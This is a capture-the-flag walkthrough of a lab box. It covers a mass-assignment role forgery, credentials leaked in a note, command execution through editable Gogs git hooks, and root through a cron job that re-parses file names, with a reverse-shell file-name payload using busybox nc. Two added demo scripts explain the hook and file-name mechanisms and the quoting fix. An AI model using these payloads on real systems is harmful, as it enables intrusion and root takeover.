Assignment (PG, Easy) walkthrough: a wildcard privilege-escalation variant

news / 2024/11/14 16:34:10 / source: https://www.cnblogs.com/wssw/p/18545733
nmap scan
┌──(root㉿kali)-[~]
└─# nmap -p- -A 192.168.157.224
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-14 04:18 UTC
Stats: 0:00:53 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 04:19 (0:00:11 remaining)
Nmap scan report for 192.168.157.224
Host is up (0.070s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp   open  http
|_http-title: notes.pg
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     HTTP/1.1 400 Bad Request
|   FourOhFourRequest, GetRequest, HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Content-Type: text/html; charset=UTF-8
|_    Content-Length: 0
8000/tcp open  http-alt
|_http-title: Gogs
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gogs=9c1c666d796b5320; Path=/; HttpOnly
|     Set-Cookie: _csrf=9VAZhezhUc2tZS5fWa9Dnk4uzHs6MTczMTU1Nzk1NjExOTI4NjE3Mg; Path=/; Domain=assignment.pg; Expires=Fri, 15 Nov 2024 04:19:16 GMT; HttpOnly
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: DENY
|     Date: Thu, 14 Nov 2024 04:19:16 GMT
|     <!DOCTYPE html>
|     <html>
|     <head data-suburl="">
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
|     <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
|     <meta name="author" content="Gogs" />
|     <meta name="description" content="Gogs is a painless self-hosted Git service" />
|     <meta name="keywords" content="go, git, self-hosted, gogs">
|     <meta name="referrer" content="no-referrer" />
|     <meta name="_csrf" content="9VAZhezhUc2tZS5fWa9Dnk4uzHs6MTczMTU1Nz
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gogs=0701106d56e58fd6; Path=/; HttpOnly
|     Set-Cookie: _csrf=mFYAKLkp10tztyPKEtdZWiAkRgc6MTczMTU1Nzk1MDg3MjcyNTg2MA; Path=/; Domain=assignment.pg; Expires=Fri, 15 Nov 2024 04:19:10 GMT; HttpOnly
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: DENY
|     Date: Thu, 14 Nov 2024 04:19:10 GMT
|     <!DOCTYPE html>
|     <html>
|     <head data-suburl="">
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
|     <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
|     <meta name="author" content="Gogs" />
|     <meta name="description" content="Gogs is a painless self-hosted Git service" />
|     <meta name="keywords" content="go, git, self-hosted, gogs">
|     <meta name="referrer" content="no-referrer" />
|_    <meta name="_csrf" content="mFYAKLkp10tztyPKEtdZWiAkRgc6MTczMTU1Nzk1MDg3M
|_http-open-proxy: Proxy might be redirecting requests
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.94SVN%I=7%D=11/14%Time=67357A3E%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,55,"HTTP/1\.0\x20403\x20Forbidden\r\nContent-Type:\x20text/h
SF:tml;\x20charset=UTF-8\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,5
SF:5,"HTTP/1\.0\x20403\x20Forbidden\r\nContent-Type:\x20text/html;\x20char
SF:set=UTF-8\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,1C,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\n\r\n")%r(X11Probe,1C,"HTTP/1\.1\x20400\x20
SF:Bad\x20Request\r\n\r\n")%r(FourOhFourRequest,55,"HTTP/1\.0\x20403\x20Fo
SF:rbidden\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nContent-Leng
SF:th:\x200\r\n\r\n")%r(GenericLines,1C,"HTTP/1\.1\x20400\x20Bad\x20Reques
SF:t\r\n\r\n")%r(RPCCheck,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")
SF:%r(DNSVersionBindReqTCP,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n"
SF:)%r(DNSStatusRequestTCP,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n"
SF:)%r(Help,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(SSLSessionR
SF:eq,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(TerminalServerCoo
SF:kie,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(TLSSessionReq,1C
SF:,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(Kerberos,1C,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\n\r\n")%r(SMBProgNeg,1C,"HTTP/1\.1\x20400\x
SF:20Bad\x20Request\r\n\r\n")%r(LPDString,1C,"HTTP/1\.1\x20400\x20Bad\x20R
SF:equest\r\n\r\n")%r(LDAPSearchReq,1C,"HTTP/1\.1\x20400\x20Bad\x20Request
SF:\r\n\r\n")%r(LDAPBindReq,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n
SF:")%r(SIPOptions,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(LAND
SF:esk-RC,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(TerminalServe
SF:r,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(NCP,1C,"HTTP/1\.1\
SF:x20400\x20Bad\x20Request\r\n\r\n")%r(NotesRPC,1C,"HTTP/1\.1\x20400\x20B
SF:ad\x20Request\r\n\r\n")%r(JavaRMI,1C,"HTTP/1\.1\x20400\x20Bad\x20Reques
SF:t\r\n\r\n")%r(WMSRequest,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n
SF:")%r(oracle-tns,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(ms-s
SF:ql-s,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(afp,1C,"HTTP/1\
SF:.1\x20400\x20Bad\x20Request\r\n\r\n")%r(giop,1C,"HTTP/1\.1\x20400\x20Ba
SF:d\x20Request\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8000-TCP:V=7.94SVN%I=7%D=11/14%Time=67357A3E%P=x86_64-pc-linux-gnu%
SF:r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\
SF:x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20B
SF:ad\x20Request")%r(GetRequest,206A,"HTTP/1\.0\x20200\x20OK\r\nContent-Ty
SF:pe:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Pat
SF:h=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gogs=0701106d56e58f
SF:d6;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=mFYAKLkp10tztyPKEtdZ
SF:WiAkRgc6MTczMTU1Nzk1MDg3MjcyNTg2MA;\x20Path=/;\x20Domain=assignment\.pg
SF:;\x20Expires=Fri,\x2015\x20Nov\x202024\x2004:19:10\x20GMT;\x20HttpOnly\
SF:r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20DENY\r\nDa
SF:te:\x20Thu,\x2014\x20Nov\x202024\x2004:19:10\x20GMT\r\n\r\n<!DOCTYPE\x2
SF:0html>\n<html>\n<head\x20data-suburl=\"\">\n\t<meta\x20http-equiv=\"Con
SF:tent-Type\"\x20content=\"text/html;\x20charset=UTF-8\"\x20/>\n\t<meta\x
SF:20http-equiv=\"X-UA-Compatible\"\x20content=\"IE=edge\"/>\n\t\n\t\t<met
SF:a\x20name=\"author\"\x20content=\"Gogs\"\x20/>\n\t\t<meta\x20name=\"des
SF:cription\"\x20content=\"Gogs\x20is\x20a\x20painless\x20self-hosted\x20G
SF:it\x20service\"\x20/>\n\t\t<meta\x20name=\"keywords\"\x20content=\"go,\
SF:x20git,\x20self-hosted,\x20gogs\">\n\t\n\t<meta\x20name=\"referrer\"\x2
SF:0content=\"no-referrer\"\x20/>\n\t<meta\x20name=\"_csrf\"\x20content=\"
SF:mFYAKLkp10tztyPKEtdZWiAkRgc6MTczMTU1Nzk1MDg3M")%r(FourOhFourRequest,1C3
SF:E,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20text/html;\x20c
SF:harset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;\x20Max-Age=214748
SF:3647\r\nSet-Cookie:\x20i_like_gogs=9c1c666d796b5320;\x20Path=/;\x20Http
SF:Only\r\nSet-Cookie:\x20_csrf=9VAZhezhUc2tZS5fWa9Dnk4uzHs6MTczMTU1Nzk1Nj
SF:ExOTI4NjE3Mg;\x20Path=/;\x20Domain=assignment\.pg;\x20Expires=Fri,\x201
SF:5\x20Nov\x202024\x2004:19:16\x20GMT;\x20HttpOnly\r\nX-Content-Type-Opti
SF:ons:\x20nosniff\r\nX-Frame-Options:\x20DENY\r\nDate:\x20Thu,\x2014\x20N
SF:ov\x202024\x2004:19:16\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head\
SF:x20data-suburl=\"\">\n\t<meta\x20http-equiv=\"Content-Type\"\x20content
SF:=\"text/html;\x20charset=UTF-8\"\x20/>\n\t<meta\x20http-equiv=\"X-UA-Co
SF:mpatible\"\x20content=\"IE=edge\"/>\n\t\n\t\t<meta\x20name=\"author\"\x
SF:20content=\"Gogs\"\x20/>\n\t\t<meta\x20name=\"description\"\x20content=
SF:\"Gogs\x20is\x20a\x20painless\x20self-hosted\x20Git\x20service\"\x20/>\
SF:n\t\t<meta\x20name=\"keywords\"\x20content=\"go,\x20git,\x20self-hosted
SF:,\x20gogs\">\n\t\n\t<meta\x20name=\"referrer\"\x20content=\"no-referrer
SF:\"\x20/>\n\t<meta\x20name=\"_csrf\"\x20content=\"9VAZhezhUc2tZS5fWa9Dnk
SF:4uzHs6MTczMTU1Nz");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/14%OT=22%CT=1%CU=44730%PV=Y%DS=4%DC=T%G=Y%TM=673
OS:57AA6%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A
OS:)OPS(O1=M578ST11NW7%O2=M578ST11NW7%O3=M578NNT11NW7%O4=M578ST11NW7%O5=M57
OS:8ST11NW7%O6=M578ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88
OS:)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M578NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
OS:T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A
OS:=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPC
OS:K=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT      ADDRESS
1   70.35 ms 192.168.45.1
2   70.34 ms 192.168.45.254
3   70.38 ms 192.168.251.1
4   70.57 ms 192.168.157.224

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.44 seconds
The scan shows three services: SSH on 22, a web app on 80 titled notes.pg, and Gogs on 8000; the cookie domain in the Gogs responses reveals the hostname assignment.pg.

Register an account on the port-80 web app and log in. The registration request captured from the browser looks like this (a Rails-style form, with a role field that the client fills in):
authenticity_token=oPR93X4UzlLdlPeg_Aek9v3XDDJLLoL3hXS8pHLwzOPz8ER61j8nzjESjr4Tsq-_VGRhZBVCZ9TSr9VZqIe5YQ&user[username]=forged_owner&user[role]=owner&user[password]=forged_owner&user[password_confirmation]=forged_owner&button=
The user[role] parameter is under the client's control (mass assignment): resubmitting the form with user[role]=owner registers the account forged_owner with the owner role instead of an ordinary one. This is the check to make whenever a sign-up form carries a role, admin or owner style field: change it and see whether the server honours it.
Information disclosure

Log in as this user.
Visiting http://192.168.157.224/notes/1 shows a note that contains another user's password:

my creds for gogs: jane:svc-dev2022@@@!;P;4SSw0Rd

These credentials log in to Gogs on port 8000.

After creating a repository, the repository settings expose a Git Hooks page. Having met git hooks on a couple of earlier boxes, this stands out immediately: the hooks (pre-receive, update, post-receive) are server-side scripts that git executes on the Gogs host, under the account the Gogs service runs as, every time something is pushed. Whoever can edit them has command execution on the server. Start a listener on the attacking machine, then append a reverse shell command to the end of one of the hooks and save it.

Once a commit is pushed the hook fires and the reverse shell connects back. From a local working copy (the remote URL is the clone URL shown on the repository page; the repository name below is a placeholder):
git init
git add README.md
git commit -m "first commit"
git remote add origin http://192.168.157.224:8000/jane/<repository>.git
git push -u origin master
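To see why editing a hook is the same as running code on the server, here is an added example; it is not part of the original post and not Gogs' own code. A plain bare repository stands in for the Gogs-managed repository, a post-receive hook that writes a marker file stands in for the reverse-shell hook, and the paths, marker name and commit identity are assumptions of the example.

```sh
#!/bin/sh
# Added example, not from the original post or from Gogs: a bare repository
# plays the Gogs-managed repository, and a post-receive hook that drops a
# marker file plays the reverse-shell hook.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
SERVER="$WORK/server.git"      # assumed: the server-side repository
CLIENT="$WORK/client"          # assumed: the attacker's working copy
MARKER="$WORK/hook-ran"        # assumed: stands in for the callback

# Server side: create the bare repo and install a post-receive hook.
# git executes hooks/* on the SERVER, under the account that serves the
# repository (on a Gogs host: the Gogs service user), never on the client.
setup_server() {
    git init -q --bare "$SERVER"
    cat > "$SERVER/hooks/post-receive" <<EOF
#!/bin/sh
# whoever edits this script runs as the serving user on every push
id > "$MARKER"
EOF
    chmod +x "$SERVER/hooks/post-receive"
}

# Client side: the same steps as the walkthrough, plus adding the remote.
# Runs in a subshell so the cd does not leak into the caller.
push_commit() (
    mkdir -p "$CLIENT" && cd "$CLIENT" || exit 1
    git init -q
    echo "# demo" > README.md
    git add README.md
    git -c user.name=demo -c user.email=demo@example.invalid \
        commit -q -m "first commit"
    git remote add origin "$SERVER"
    git push -q origin HEAD:refs/heads/master 2>/dev/null
)

# Returns 0 if the hook fired on the server side (marker written), 1 otherwise.
hook_ran() {
    [ -s "$MARKER" ]
}

run_demo() {
    setup_server
    push_commit
    if hook_ran; then
        echo "post-receive hook executed server-side as: $(cat "$MARKER")"
    else
        echo "hook did not run"
    fi
}

run_demo
```

The marker records the identity the hook ran under, which is the point: on a Gogs host that identity is the service account, not the user who pushed. The `HEAD:refs/heads/master` refspec pushes the current branch regardless of the local default branch name.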


Run pspy64 on the box to watch process creation without root. It reveals a cron job running as root that processes the files in a directory (the job itself is visible in the original screenshots); cross-checking the schedule and script body in /etc/crontab and /etc/cron.d/* is the usual confirmation.

This is a variant of the classic wildcard privilege escalation. In the classic form a file name is consumed as a command-line option when an unquoted * expands; here the file name is spliced into a command string that a shell re-parses, so a $(...) inside the name is executed as root. That is the precondition for this to work: the script must hand the name back to a shell (eval, sh -c, or similar); a loop that passes the name as a quoted argument would treat it as plain data. Create a file whose name is the payload:
touch '$(busybox nc 192.168.45.250 8000 -e bash)'
Two constraints shape the payload: a file name cannot contain / (or NUL), so every program in it is resolved through PATH, and the whole command has to fit inside one name. With a listener waiting on 192.168.45.250:8000, the next run of the job spawns the shell, and because the job runs as root, the shell is root.
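The mechanism, as an added example that is not the box's cron script (the post shows that only as a screenshot): a throwaway directory stands in for the directory the root job processes, both loop shapes are assumptions, and the booby-trapped file name creates a marker file instead of calling back. The second loop is the hardened shape in which the same name is harmless.

```sh
#!/bin/sh
# Added example, not the box's cron script: reproduces why a file named
# '$(...)' gets executed by a job that splices names into a shell command,
# and shows the loop shape that is immune to it.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
INBOX="$WORK/inbox"            # assumed: the directory the root job processes

# Fresh inbox: one ordinary file and one constructed booby-trapped name.
# The payload has the same shape as touch '$(busybox nc ... -e bash)' but
# only creates a marker file called "injected" inside the inbox.
reset_inbox() {
    rm -rf "$INBOX"
    mkdir -p "$INBOX"
    touch "$INBOX/report.txt"
    touch "$INBOX/"'$(touch injected)'
}

# Assumed vulnerable shape: the name is interpolated into a command STRING
# that is handed to another shell, which parses the $(...) and runs it.
vulnerable_job() (
    cd "$INBOX" || exit 1
    for f in *; do
        sh -c "ls -ld $f" </dev/null >/dev/null 2>&1
    done
)

# Hardened shape: the name is passed as a quoted ARGUMENT after --, so no
# shell ever re-parses it; $(...) stays an odd file name.
hardened_job() (
    cd "$INBOX" || exit 1
    for f in *; do
        ls -ld -- "$f" </dev/null >/dev/null 2>&1
    done
)

# Returns 0 if the payload ran (marker exists), 1 otherwise.
payload_ran() {
    [ -e "$INBOX/injected" ]
}

run_demo() {
    reset_inbox
    vulnerable_job
    if payload_ran; then
        echo "vulnerable loop: file name was executed as a command"
    fi
    reset_inbox
    hardened_job
    if payload_ran; then
        echo "hardened loop: payload ran (unexpected)"
    else
        echo "hardened loop: file name treated as data"
    fi
}

run_demo
```

The inner `sh -c` receives the text `ls -ld $(touch injected)` and evaluates the substitution before it ever looks for a file; the hardened loop hands the same bytes to `ls` as one argument, so nothing interprets them. Quoting and `--` are the fix, not filtering file names.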
